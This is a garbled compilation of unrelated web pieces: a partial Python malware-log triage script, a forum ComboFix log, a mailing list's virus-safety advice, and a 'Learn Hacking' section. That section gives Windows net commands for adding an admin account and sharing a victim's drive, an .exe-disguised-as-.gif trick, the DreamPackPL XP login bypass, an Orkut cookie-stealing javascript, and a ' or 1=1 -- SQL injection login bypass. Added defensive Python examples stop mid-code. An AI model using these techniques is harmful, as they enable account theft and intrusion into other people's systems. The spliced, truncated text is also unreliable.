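"%windir%\\system32\\sessmgr.exe"=
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"5985:TCP"= 5985:TCP:*:Enabled:Windows Remote Management
.
R3 Lavasoft Kernexplorer;Lavasoft helper driver;c:\program files\Lavasoft\Ad-Aware\KernExplorer.sys [x]
S3 WinRM;Windows Remote Management (WS-Management);c:\windows\system32\svchost.exe -k WinRM [2006-09-05 14336]
"""

SECTION_RE = re.compile(r"^\[(.+)\]$")                                   # [HKLM\...] headers
OPEN_PORT_RE = re.compile(r'^"(\d+):(TCP|UDP)"\s*=\s*\d+:(?:TCP|UDP):([^:]*):([^:]*):(.*)$')
DRIVER_RE = re.compile(r"^([RS]\d)\s+([^;]+);([^;]*);(.*?)\s*\[x\]$")    # [x] = file not found
NOFILE_RE = re.compile(r"^(BHO|TB|EB):\s*(?:[^{]*?:\s*)?(\{[0-9A-Fa-f-]{36}\})\s*-\s*No File$")
HOSTS_RE = re.compile(r"^Hosts?:\s*(\S+)\s+(\S+)$")


@dataclass
class Triage:
    open_ports: List[Tuple[str, str, str, str]] = field(default_factory=list)  # (port, proto, state, name)
    missing_drivers: List[Tuple[str, str, str]] = field(default_factory=list)  # (start type, service, path)
    no_file_entries: List[Tuple[str, str]] = field(default_factory=list)       # (kind, clsid)
    hosts_overrides: List[Tuple[str, str]] = field(default_factory=list)       # (ip, hostname)


def triage(text: str) -> Triage:
    """Walk the log line by line, tracking the current [registry] section so that
    port rules are only taken from the GloballyOpenPorts list."""
    result = Triage()
    section = ""
    for raw in text.splitlines():
        line = raw.strip()
        m = SECTION_RE.match(line)
        if m:
            section = m.group(1)
            continue
        m = OPEN_PORT_RE.match(line)
        if m and "GloballyOpenPorts" in section:
            port, proto, _scope, state, name = m.groups()
            result.open_ports.append((port, proto, state, name.strip()))
            continue
        m = DRIVER_RE.match(line)
        if m:
            start, service, _desc, path = m.groups()
            result.missing_drivers.append((start, service.strip(), path.strip()))
            continue
        m = NOFILE_RE.match(line)
        if m:
            result.no_file_entries.append((m.group(1), m.group(2)))
            continue
        m = HOSTS_RE.match(line)
        if m:
            result.hosts_overrides.append((m.group(1), m.group(2)))
    return result


def findings(t: Triage) -> List[str]:
    """Turn the parsed entries into the review notes a helper would act on."""
    notes = []
    for port, proto, state, name in t.open_ports:
        notes.append(f"firewall: inbound {port}/{proto} is {state} for '{name}'; "
                     "confirm the service is wanted, otherwise close the port")
    for start, service, path in t.missing_drivers:
        notes.append(f"driver: {start} {service} points at missing file {path}; "
                     "orphaned entry, remove the service")
    for kind, clsid in t.no_file_entries:
        notes.append(f"{kind}: {clsid} has no backing file; dead registration, safe to delete")
    for ip, host in t.hosts_overrides:
        notes.append(f"hosts: {host} is pinned to {ip}; check it is a deliberate block")
    return notes


if __name__ == "__main__":
    for note in findings(triage(SAMPLE_LOG)):
        print(note)
```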
 
Re: Trojan / HTML Script Virus (Windows XP)
After running ComboFix, my PC rebooted, but it took 40 minutes before I could log in again.

ComboFix log:

ComboFix 11-11-14.03 - Dan 15/11/2011 10:39:27.2.1 - x86
Menjalankan dari: c: \ Documents and Settings \ Dan \ Desktop \ ComboFix.exe
Perintah switch digunakan :: c: \ Documents and Settings \ Dan \ Desktop \ CFScript.txt
AV: AntiVir Desktop * Cacat / Diperbarui * {AD166499-45F9-482A-A743-FDD3350758C7}
.
.
(((((((((((((((((((((((((((((((((((((((Penghapusan lain))))))))) ))))))))))))))))))))))))))))))))))))))))
.
.
.
(((((((((((((((((((((((((((((((((((((((Driver / Jasa)))))))) )))))))))))))))))))))))))))))))))))))))))
.
.
------- \ Legacy_LAVASOFT_KERNEXPLORER
------- \ Service_Lavasoft Kernexplorer
.
.
(((((((((((((((((((((((((File Dibuat dari 2011/10/15 ke 2011-11-15))))))))))) ))))))))))))))))))))
.
.
2011/11/14 16:24. 2011/11/14 18:30 -------- d ----- w-c: \ Documents and Settings \ Administrator
2011/11/4 19:57. 2011/11/04 19:58 -------- d ----- w-c: \ program files \ Realtek AC97
2011/11/04 16:17. 2011/11/04 16:17 -------- d ----- w-c: \ Documents and Settings \ New Folder
.
.
.
((((((((((((((((((((((((((((((((((((((((Find3M Laporan)))))))) ))))))))))))))))))))))))))))))))))))))))))))
.
2011/11/13 09:10. 2011/08/28 16:11 414.368 ---- aw-c: \ windows \ system32 \ FlashPlayerCPLApp.cpl
2011/10/10 14:22. 2006/08/27 19:30 692.736 ---- aw-c: \ windows \ system32 \ inetcomm.dll
2011/10/03 04:06. 2010-11-02 22:19 472.808 ---- aw-c: \ windows \ system32 \ deployJava1.dll
2011/10/03 01:37. 2011/07/01 19:00 73728 ---- aw-c: \ windows \ system32 \ javacpl.cpl
2011/09/28 07:06. 2006/09/05 14:50 599.040 ---- aw-c: \ windows \ system32 \ crypt32.dll
2011/09/26 10:41. 2008-07-29 19:59 611.328 ---- aw-c: \ windows \ system32 \ uiautomationcore.dll
2011/9/26 10:41. 2006/09/05 14:56 220.160 ---- aw-c: \ windows \ system32 \ oleacc.dll
2011/09/26 10:41. 2006/09/05 14:56 20.480 ---- aw-c: \ windows \ system32 \ oleaccrc.dll
2011/09/22 10:36. 2011/03/17 09:50 101.720 ---- aw-c: \ windows \ system32 \ drivers \ SBREDrv.sys
2011/09/06 13:20. 2006-08-28 03:19 1.858.944 ---- aw-c: \ windows \ system32 \ win32k.sys
2011/08/31 16:00. 2010-11-03 21:33 22216 ---- aw-c: \ windows \ system32 \ drivers \ mbam.sys
2011/08/22 23:48. 2006-08-28 03:19 916.480 ---- aw-c: \ windows \ system32 \ wininet.dll
2011-08-22 23:48 . 2006-09-05 14:54 43520 ------w- c:\windows\system32\licmgr10.dll
2011-08-22 23:48 . 2006-09-05 14:52 1469440 ------w- c:\windows\system32\inetcpl.cpl
2011-08-22 11:56 . 2006-09-05 14:52 385024 ----a-w- c:\windows\system32\html.iec
2011-08-17 13:49 . 2006-09-05 14:49 138496 ----a-w- c:\windows\system32\drivers\afd.sys
.
.
((((((((((((((((((((((((((((((((((((((((  SnapShot@2011-11-14_18.33.38  ))))))))))))))))))))))))))))))))))))))))
.
+ 2011-11-15 11:13 . 2011-11-15 11:13 16384 c:\windows\Temp\Perflib_Perfdata_450.dat
.
((((((((((((((((((((((((((((((((((((((((  Reg Loading Points  ))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"CCleaner"="c:\program files\CCleaner\CCleaner.exe" [2011-07-25 2585408]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SoundMan"="SOUNDMAN.EXE" [2007-04-16 577536]
"PCMService"="c:\apps\PowerCinema\PCMService.exe" [2006-02-23 147456]
"DetectorApp"="c:\program files\Sonic\DigitalMedia LE v7\MyDVD LE\DetectorApp.exe" [2005-10-20 102400]
"ISUSPM Startup"="c:\progra~1\COMMON~1\INSTAL~1\UPDATE~1\ISUSPM.exe" [2004-07-27 221184]
"ISUSScheduler"="c:\program files\Common Files\InstallShield\updateservice\issch.exe" [2004-07-27 81920]
"Vade Retro Outlook Express"="c:\progra~1\GOTOSO~1\VADERE~1\Vaderetro_oe.exe" [2004-10-04 310272]
"avgnt"="c:\program files\Avira\AntiVir Desktop\avgnt.exe" [2010-08-02 281768]
"SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2011-06-09 254696]
.
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="c:\windows\system32\ctfmon.exe" [2008-04-14 15360]
.
[HKLM\~\startupfolder\C:^Documents and Settings^All Users^Start Menu^Programs^Startup^Adobe Reader Speed Launch.lnk]
path=c:\Documents and Settings\All Users\Start Menu\Programs\Startup\Adobe Reader Speed Launch.lnk
backup=c:\windows\PSS\Adobe Reader Speed Launch.lnkCommon Startup
.
[HKLM\~\startupfolder\C:^Documents and Settings^Dan^Start Menu^Programs^Startup^EvernoteClipper.lnk]
path=c:\Documents and Settings\Dan\Start Menu\Programs\Startup\EvernoteClipper.lnk
backup=c:\windows\PSS\EvernoteClipper.lnkStartup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Messenger (Yahoo!)]
2009-05-26 20:06 4351216 ----a-w- c:\program files\Yahoo!\Messenger\yahoomessenger.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
2010-11-29 17:38 421888 ----a-w- c:\program files\QuickTime\QTTask.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RealTray]
2006-08-27 20:28 26112 -c--a-w- c:\program files\Estat\RealPlayer\realplay.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Recguard]
2002-09-13 20:42 212992 -c--a-w- c:\windows\SMINST\Recguard.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RIMBBLaunchAgent.exe]
2011-02-18 10:47 79192 -c--a-w- c:\program files\Common Files\Research In Motion\USB Driver\RIMBBLaunchAgent.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Yahoo! Pager]
2009-05-26 20:06 4351216 ----a-w- c:\program files\Yahoo!\Messenger\yahoomessenger.exe
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"C:\\APPS\\PowerCinema\\PowerCinema.exe"=
"C:\\APPS\\PowerCinema\\PCMService.exe"=
"C:\\Program Files\\Yahoo!\\Messenger\\yahoomessenger.exe"=
"C:\\Program Files\\Messenger\\msmsgs.exe"=
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\wlcsdk.exe"=
"C:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe"=
"C:\\Program Files\\Bonjour\\EXE"=
"C:\\Program Files\\Mozilla Firefox\\firefox.exe"=
"C:\\Program Files\\Research In Motion\\BlackBerry Desktop\\Rim.Desktop.exe"=
.
.
Contents of the 'Scheduled Tasks' folder
.
2011-11-12 c:\windows\Tasks\AppleSoftwareUpdate.job
- c:\program files\Apple Software Update\SoftwareUpdate.exe [2009-10-22 11:50]
.
.
------- Supplementary Scan -------
.
uStart Page = about:blank
mStart Page = hxxp://www.yahoo.com/?ilc=8
uInternet Settings,ProxyOverride = *.local
TCP: DhcpNameServer = 192.168.0.1
FF - ProfilePath - c:\Documents and Settings\Dan\Application Data\Mozilla\Firefox\Profiles\2cqiyjwl.default\
FF - prefs.js: browser.startup.homepage - about:blank
FF - Ext: Default: {972ce4c6-7e08-4474-a285-3208198ce6fd} - c:\program files\Mozilla Firefox\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
FF - Ext: Java Console: {CAFEEFAC-0016-0000-0022-ABCDEFFEDCBA} - c:\program files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0022-ABCDEFFEDCBA}
FF - Ext: Java Console: {CAFEEFAC-0016-0000-0023-ABCDEFFEDCBA} - c:\program files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0023-ABCDEFFEDCBA}
FF - Ext: Java Console: {CAFEEFAC-0016-0000-0024-ABCDEFFEDCBA} - c:\program files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0024-ABCDEFFEDCBA}
FF - Ext: Java Console: {CAFEEFAC-0016-0000-0026-ABCDEFFEDCBA} - c:\program files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0026-ABCDEFFEDCBA}
FF - Ext: Java Console: {CAFEEFAC-0016-0000-0029-ABCDEFFEDCBA} - c:\program files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0029-ABCDEFFEDCBA}
FF - Ext: pdf download: {37E4D8EA-8BDA-4831-8EA1-89053939A250} - %profile%\extensions\{37E4D8EA-8BDA-4831-8EA1-89053939A250}
FF - Ext: Flashblock: {3d7eb24f-2740-49df-8937-200b1cc08f8a} - %profile%\extensions\{3d7eb24f-2740-49df-8937-200b1cc08f8a}
FF - Ext: NoScript: {73a6fe31-595d-460b-A920-fcc0f8843232} - %profile%\extensions\{73a6fe31-595d-460b-A920-fcc0f8843232}
FF - Ext: DownloadHelper: {b9db16a4-6edc-47ec-a1f4-b86292ed211d} - %profile%\extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}
FF - Ext: Adblock Plus: {d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d} - %profile%\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}
FF - Ext: Download Statusbar: {D4DD63FA-01E4-46a7-B6B1-EDAB7D6AD389} - %profile%\extensions\{D4DD63FA-01E4-46a7-B6B1-EDAB7D6AD389}
FF - Ext: Pixlr Grabber: {d47a9f51-8281-43fa-f450-f28ef8735e9a} - %profile%\extensions\{d47a9f51-8281-43fa-f450-f28ef8735e9a}
FF - Ext: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - c:\windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF - Ext: Java Quick Starter: jqs@sun.com - c:\program files\Java\jre6\lib\deploy\jqs\ff
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, GMER - Rootkit Detector and Remover
Rootkit scan 2011-11-15 11:17
Windows 5.1.2600 Service Pack 3 NTFS
.
scanning hidden processes ...
.
scanning hidden autostart entries ...
.
scanning hidden files ...
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
--------------------- DLLs Loaded Under Running Processes ---------------------
.
- - - - - - - > 'winlogon.exe'(680)
c:\windows\system32\Ati2evxx.dll
.
- - - - - - - > 'explorer.exe'(2324)
c:\windows\system32\WININET.dll
c:\progra~1\GOTOSO~1\VADERE~1\VrOe_hook.dll
c:\progra~1\WINDOW~2\wmpband.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\webcheck.dll
c:\windows\system32\WPDShServiceObj.dll
c:\windows\system32\PortableDeviceTypes.dll
c:\windows\system32\PortableDeviceApi.dll
.
------------------------ Other Running Processes ------------------------
.
c:\windows\system32\Ati2evxx.exe
c:\program files\Avira\AntiVir Desktop\sched.exe
c:\program files\Avira\AntiVir Desktop\avguard.exe
c:\windows\system32\Ati2evxx.exe
c:\program files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
c:\program files\Avira\AntiVir Desktop\avshadow.exe
c:\program files\Bonjour\EXE
c:\apps\Powercinema\Kernel\TV\CLCapSvc.exe
c:\apps\Powercinema\Kernel\CLML_NTService\CLMLServer.exe
c:\program files\Java\jre6\bin\jqs.exe
c:\program files\Sonic\DigitalMedia LE v7\MyDVD LE\USBDeviceService.exe
c:\apps\Powercinema\Kernel\TV\CLSched.exe
c:\windows\SOUNDMAN.EXE
.
**************************************************************************
.
Completion time: 2011-11-15 11:43:04 - machine was rebooted
ComboFix-quarantined-files.txt 2011-11-15 11:42
ComboFix2.txt 2011-11-14 18:44
.
Pre-Run: 57,885,630,464 bytes free
Post-Run: 57,749,598,208 bytes free
.
- - End Of File - - AADA09C2AF0A8505ACED65A344ED4C8F
 

 
 

Computer Viruses, Worms, Trojan Horses and Malicious Scripts

There are bad people out there - protect yourself!

 

Latest Alarm

Hoaxes

Before e-mailing any virus warning to relatives and friends, always check the following list first:
  • Hoaxes (Symantec Anti Virus Research Center)
Before e-mailing any other urgent warning or story, always check the following websites first:
You may find that the latest "hot scoop" has been circulating on the Internet for years.

How We Protect You

  • All our e-mail messages, both incoming and outgoing, are automatically and individually scanned by anti-virus software. This protects our computers from becoming infected and prevents passing any infection on to you.
  • The anti-virus software and virus definitions are automatically checked for updates every day, to make sure we catch new viruses as soon as they are developed.
  • The KUBA-L mailing list (like all other RootsWeb mailing lists) does not distribute attachments or messages in anything other than plain text, such as html (the language of web pages). This prevents the spread of viruses or malicious scripts through the list. Please note that there are many other genealogy lists, not hosted by RootsWeb, which do not strip attachments and can be a channel for virus infection.
    Please do not send any virus warnings to the KUBA-L list - it is against RootsWeb policy and list rules. If you suspect a virus in a list message, please contact the list administrator directly. It is almost certain that the message was NOT distributed by the list even though the words "[KUBA-L]" may appear in the subject line.
  • We do not use Microsoft Outlook as a mail client. Because of its popularity, many virus attacks are targeted at that particular software. If you use Outlook, be sure to check frequently for security updates available for download from Microsoft.

How to Protect Yourself

  • Install anti-virus software on your computer - and keep it updated! New viruses are being developed every day and you must keep the software up to date for it to be effective. If your software has an automatic update feature, be sure to enable it. Make sure your anti-virus software is enabled to scan all incoming e-mail.
  • Back up your hard disk regularly, at least once a week. That way, if a malicious worm wipes out your entire drive, you will be able to recover.
  • NEVER double-click an e-mail attachment to open it. Instead, right-click the attachment once and save it to the desktop. This gives the anti-virus software a chance to check the contents of the attachment.
  • Do not automatically trust that a message is OK because you recognize the source. Some recent viruses steal addresses from the "in basket" of an infected computer and use those addresses to make you believe the message came from someone you know.
  • If you can identify the sender of an infected message, be sure to tell them that their computer is infected. Sometimes the virus will corrupt the sender's address (for example by adding a hyphen at the front) to prevent you from doing this. You will have to correct the address before you can successfully send a reply.

If You Are Infected

  • If your computer is still operational, visit the major anti-virus sites, review the characteristics of the virus and download the removal tool specific to that virus. The major anti-virus software manufacturers (see below) all provide these tools free of charge. Run the tool on your computer to remove the virus.
  • Update your anti-virus software (in some cases you may have to reinstall it first) and the virus definitions. Then run a full scan on your computer to make sure nothing remains of this or any other virus.

Recommended Internet Security Software

WARNING: We do not recommend "Norton SystemWorks". We have had serious problems with the "GoBack" utility included in this software, which forced us to completely reinstall Windows and all other programs on the computer. Symantec Technical Support was no help at all in this matter.

Virus Information Sites


Learn Hacking

Cracking Zip File Passwords!


Make an .exe file into a .gif file!!

Just go to the Run prompt and type:

cscript.exe hide.vbs your.gif your.exe

The script combines "your.gif" and "your.exe" to make "your.gif.hta.gif", which displays correctly in the IE browser. If the 'Hide extensions for known file types' option is enabled, which is the default setting, "Save Picture As ..." will download "your.gif", which is really "your.gif.hta". (Example: right-click and Save Homer)

Microsoft describes HTA as running like an .exe file.

Enable Task Manager if it is disabled!

Method no. 1

1. Click Start -> Run -> type regedit and press Enter.

2. Navigate to the following registry keys and verify that the following settings are in effect:

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\LocalUser\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"DisableCAD"=dword:00000000

3. Reboot the computer.

Method no. 2

1. Click Start -> Run -> type gpedit.msc and press Enter.

2. Navigate to User Configuration -> Administrative Templates -> System -> Ctrl+Alt+Del Options

3. On the right side of the screen, verify that the Remove Task Manager option is set to Disabled or Not Configured.

4. Close gpedit.msc

5. Click Start -> Run -> type gpupdate /force and press Enter.
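What the two methods above check by hand can also be checked from a registry export. The following is an added example, not code from the original post: a small Python parser for the .reg format shown in Method 1. It reads an export and reports every DisableTaskMgr or DisableCAD value that is set to anything other than zero, which is what an infection that locks Task Manager leaves behind and what should be gone after the fix. The export text it parses is constructed for the example; the key paths and value names are the ones listed above, and the function names are assumptions.

```python
"""Audit a .reg export for the policy values that disable Task Manager.

Added example, not part of the original post. It parses the .reg format
shown in Method 1 (a "Windows Registry Editor Version 5.00" export) and
reports every DisableTaskMgr / DisableCAD value that is not zero, so a
defender can confirm the lockout is (or is no longer) in place without
reading regedit by hand. The sample export below is constructed.
"""
import re

# Value names the post tells the reader to check; anything non-zero locks
# the user out of Task Manager / the Ctrl+Alt+Del screen.
WATCHED_VALUES = {"DisableTaskMgr", "DisableCAD"}

KEY_RE = re.compile(r"^\[(?P<key>[^\]]+)\]\s*$")
# Accepts both the canonical form ("X"=dword:00000001) and the spaced form
# that appears in the post ("X" = dword: 00000001).
DWORD_RE = re.compile(r'^"(?P<name>[^"]+)"\s*=\s*dword:\s*(?P<hex>[0-9A-Fa-f]{1,8})\s*$')


def parse_reg(text):
    """Return {key: {value_name: int}} for all dword values in a .reg export."""
    entries = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        m = KEY_RE.match(line)
        if m:
            current = m.group("key")
            entries.setdefault(current, {})
            continue
        m = DWORD_RE.match(line)
        if m and current is not None:
            entries[current][m.group("name")] = int(m.group("hex"), 16)
    return entries


def find_lockouts(text):
    """Return sorted (key, value_name, value) triples where a watched value is non-zero."""
    hits = []
    for key, values in parse_reg(text).items():
        for name, value in values.items():
            if name in WATCHED_VALUES and value != 0:
                hits.append((key, name, value))
    return sorted(hits)


# Constructed sample: an export from a machine where malware set the HKCU
# policy to 1 while the HKLM policy and DisableCAD are untouched.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"DisableCAD"=dword:00000000
"Shell"="explorer.exe"
"""

if __name__ == "__main__":
    for key, name, value in find_lockouts(SAMPLE_EXPORT):
        print(f"{name}={value} under {key}: Task Manager lockout in effect")
```

On a real machine the text would come from "regedit /e" or "reg export" of the four keys above; running the audit before and after Method 1 or 2 shows whether the change actually took effect under every key the post lists.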

Tips on how to start Hacking!

1) the ping command
a cool way to greet the victim
try
ping [victim's ip goes here]
if the result is request timed out then the user is offline
if the result is reply from [ip] bytes=32 time<1ms TTL 64
the victim is online.

2) net user [anyname] / add
it adds a new net user; put any name in place of [anyname]

3) net localgroup administrator [anyname] / add
This is the command that puts your user into the administrators
group.
Depending on the windows version the name will be different.
If you have the american version the name of the group is Administrators
and for the portuguese version it is administradores, so it's good to
know which version of windows xp you are going to try to share.

4) net share system=C:\ /unlimited
This command shares the C: drive under the name system.
You can use any root dir instead.

5) net use \\victimip [nameofnetaccount]
This command will create a session between you and the victim.
Of course where it says victimip you will enter the victim's ip.
and nameofnetuser is the name under which the victim logs on.

6) explorer \\victimip\system
And this will open windows explorer in the system share, which is the
victim's C: drive, with administrator access!

Basic needs for Hacking!

1. Learn about hardware - basically how your computer works.

2. Learn about the different types of software.

3. Learn DOS. (Learn everything possible)

4. Learn how to make a simple batch file.

5. Port scanning. (Download Blues port scanner if this is your first time)

6. Learn a few programming languages
HTML, C++, Python, Perl .... (I would recommend you learn html as your first lang)

7. How to secure yourself (proxies, ip hiding etc.)

8. FTP

9. TCP/IP, UDP, DHCP,

10. Get your hands dirty with networking

11. Learn assembler language (the most basic language for understanding machine language, and very useful for understanding when something is disassembled and decompiled)

12. Learn to use the Unix os. (Unix systems are generally loaded with networking tools as well as some hacking tools)

13. Learn how to use exploits and compile them. (Perl and c++ are a must)

Hack into a Win XP computer without Cracking the Password!

There is a far better way to get into Windows XP. It is easy and it does not reset the password. Hack into a computer running Windows XP without changing the password, and find out each and every password on the machine (including admin accounts). You do not need access to any account to do this. Of course, do not do this on someone else's computer without proper authorization.


1. Get physical access to the machine. Remember that it must have a CD or DVD drive.

2. Get DreamPackPL HERE

3. Unzip the downloaded dreampackpl.zip and you will get dreampackpl.ISO.

4. Use a burning program that can burn ISO images.

5. Once you have the disk, boot from the CD or DVD drive. You will see Windows 2000 Setup and it will load some files.

6. Press "R" to install DreamPackPL.

7. Press "C" to install DreamPackPL using the recovery console.

8. Select the Windows installation currently on the computer (usually it is "1" if you have only one Windows installed)

9. Back up your original sfcfiles.dll by typing:
"Ren C:\Windows\System32\sfcfiles.dll sfcfiles.lld" (without the quotes)

10. Copy the hacked file from the CD to the system32 folder. Type:
"Copy D:\i386\pinball.ex_ C:\Windows\System32\sfcfiles.dll" (without the quotes and assuming your CD drive is D:)

11. Type "exit", remove the disk and reboot.

12. In the password field, type "dreamon" (without the quotes) and the DreamPack menu will
appear.

13. Click the top graphic on the DreamPack menu and you will get a popup menu.


14. Go to commands, enable the options and enable the god command.



You can also go to Passwords and select "Logon with wrong password and hash". This option lets you log in with ANY password.

If you cannot open DreamPackPL then disable your Anti Virus ..



Hack Megaupload!

1. Go to the following site:

Click here

2. Type the megaupload link in the textbox where http:// is already written.

3. Uncheck all the options, such as "No Cookies, No Script, No Images, Hide Referrer, Hide User Agent, Hide Title, Hide Headers"

4. Click the "I agree and want to surf anonymously" button.

After that there will be NO LIMIT.

Download from megaupload.com:
Here is my tutorial for downloading from megaupload.com without getting the annoying "300 slots busy" message.

Download the User Agent Switcher AddOn then follow the instructions
For FIREFOX:
Click Install Now to install the addon.
Restart FireFox. Tools -> User Agent Switcher ---> Options ---> Options
Click User Agent ---> Add
Type this:

◘ Description: MEGAUPLOAD

◘ User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; Alexa Toolbar)

Click OK twice to finish adding the User Agent.

From now on, before downloading a file on megaupload just go to Tools -> User Agent Switcher ---> MEGAUPLOAD.

For IE:

Start/run- >> type regedit -> ok
Go to: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform]

Note: if you are using IE 7

go to: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform]
Right-click on Post Platform > New > String Value > type Alexa Toolbar > ok
Now you can download from megaupload without errors

Orkut Cookie Stealer Hacking!

First get firefox and the cookie editor plugin for it ... you will need them ...
then make two fake accounts ... you will need one to receive the cookies and one to advertise your script, so that if orkut starts deleting profiles like that your real account won't be compromised ...
then here's the script
Code:
javascript: tidak ada = replyForm; nobody.toUserId.value = 62915936;
nobody.action = 'Scrapbook.aspx Action.writeScrapBasic?'; nobody.submit ()

you see the part 62915936? that's the one you need to edit to get the cookies to your account ..... HOW TO PUT YOUR NUMBER IN THAT PART??? Follow these steps:

go to your ALBUM section ... go to ANY photo and right-click on it, look at the properties of your display picture ... you will see something like 12345678.jpg
there will be an eight-digit value .. now put that value in the javascript above. that's it. now your javascript will look like
javascript: tidak ada = replyForm; nobody.toUserId.value = yournumber;
nobody.action = 'Scrapbook.aspx Action.writeScrapBasic?'; nobody.submit ()

Now give this script to the victim, ask him to go to his scrapbook and paste this script in the address bar and press enter. now you will get the cookies in your scrapbook ..
now after getting the cookies ... go to your home page and open the cookie editor plugin (TOOLS -> COOKIE EDITOR) ... type orkut in the text box and click filter/refresh. look for the orkut_state cookie. just double-click it and replace the orkut_state part with your victim's ...
no need to change the _umbz _umbc parts ...

ANOTHER SCRIPT: 100% working
put your eight-digit number in place of (53093255)


Website hacking!

Servers with a single-step login can be accessed through this method.

Not all sites yet

If you have knowledge of html and javascript then you can access password-protected sites.
1. Open the site you want to hack. Provide a wrong username-password in its log-in form.

(For example: Username: me and Password: ' or 1=1 --)

An error will occur saying wrong username-password. Now get ready

The attempt starts from here ...

2. Right-click anywhere on the error page =>> go to view source.


3. There you can see the html coding with javascripts.


4. There you find something like this .... <_form action="..login....">
<= .. Login ....>

5. Before this login information <= __LOGIN> copy the url of the site where you are.

(For example: "<_form..........action=http://www.targetwebsite.com/login.......> <.......... = HTTP : com = ""> ") <.......... = HTTP: com =" ">


6. Then delete the javascript from above that validates your information on the server. (Do this carefully; your success in hacking this site depends on how efficiently you delete the javascripts that validate your account information)


7. Then look closely for "<_input type="password"> name="password"" [without the quotes] -> replace "<_type=text>" there <= TEXT> instead of "<_type=password>" < = TEXT> <=> See there if the MaxLength of the password is less than 11, then increase it to 11. (for example: if then write)


8. Just go to file => save as and save it anywhere on your hard disk with the ext .html (for example: c:\eg.html)


9. Open your target web page by double-clicking the 'eg.html' file you saved.


10. You see that there are some changes on the current page compared to the original one. Don't worry.

11. Give the username [for example: hacker] and password [for example: ' or 1=1 --]


Congrats!! You have successfully cracked the above site and entered the account of the 1st user stored in the server's database.


[Please read "_form" = "form" & "_type" = "type" & "_input" = "input" without the quotes]

The above trick will not work on sites that use the latest techniques to protect their servers. But you can find many sites!
Enjoy!
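Why the password above gets past the check, and what closes it, as an added example that is not part of the original post. It uses Python's sqlite3 module with a constructed two-user table and shows the server's login query two ways: built by string concatenation, which is how the sites this trick works on did it, and with bound parameters. The names login_vulnerable, login_parameterized and the sample accounts are assumptions for the example. Note that deleting the page's JavaScript (step 6) removes nothing the server relies on; the weakness is entirely in how the server builds its query, and the parameterized form is the fix.

```python
"""Why the "' or 1=1 --" login bypass works, and what stops it.

Added example, not from the original post. Builds an in-memory SQLite
users table (constructed sample data) and runs the login query the post
is attacking both ways: values pasted into the SQL text, and values
passed as bound parameters.
"""
import sqlite3


def make_db():
    """Constructed sample: two users, plaintext passwords for brevity."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "s3cret-admin"), ("alice", "alice-pw")],
    )
    return con


def login_vulnerable(con, username, password):
    """Server-side check as the attacked sites did it: values pasted into SQL.

    Returns the username of the first matching row, or None.
    """
    sql = (
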